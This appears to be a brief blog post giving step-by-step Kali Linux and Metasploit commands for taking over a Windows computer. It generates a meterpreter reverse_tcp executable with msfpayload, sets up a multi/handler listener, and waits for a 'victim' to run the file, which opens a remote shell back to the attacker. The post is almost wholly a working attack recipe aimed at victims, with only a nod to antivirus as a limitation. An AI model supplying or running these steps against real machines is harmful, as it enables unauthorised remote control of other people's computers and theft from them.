Hacking windows computers have always been the first thing which you want to learn when you go into penetration testing as 3 of every 5 computers in the world are running windows on it. We don't intend to harm the reputation of Microsoft but hacking a windows computer that doesn't have any protection from any third party software is quite easy.
What you need?
Kali Linux on VMware..
How to?
Note:-
If the victim is protected with any fairly good antivirus then this method will fail.
What you need?
Kali Linux on VMware..
How to?
- Open a new terminal window type ifconfig and hit enter. Note down the eth0 IP address.
- Now type msfpayload windows/meterpreter/reverse_tcp lhost=ip x > hcak.exe and hit enter. You can change the file name to anything you want instead of hcak.exe.
- Now type service postgresql start and hit enter then type service metasploit start and hit enter.
- Now type msfconsole and hit enter.
- Now type use exploit/multi/handler and hit enter & after that type set payload windows/meterpreter/reverse_tcp to set the payload for the meterpreter.
- Now set the lhost by typing set lhost ip. And then exploit and hit enter.
- Now wait tell the victim runs the exe file and then you can connect to the victim.
Note:-
If the victim is protected with any fairly good antivirus then this method will fail.
No comments :
Post a Comment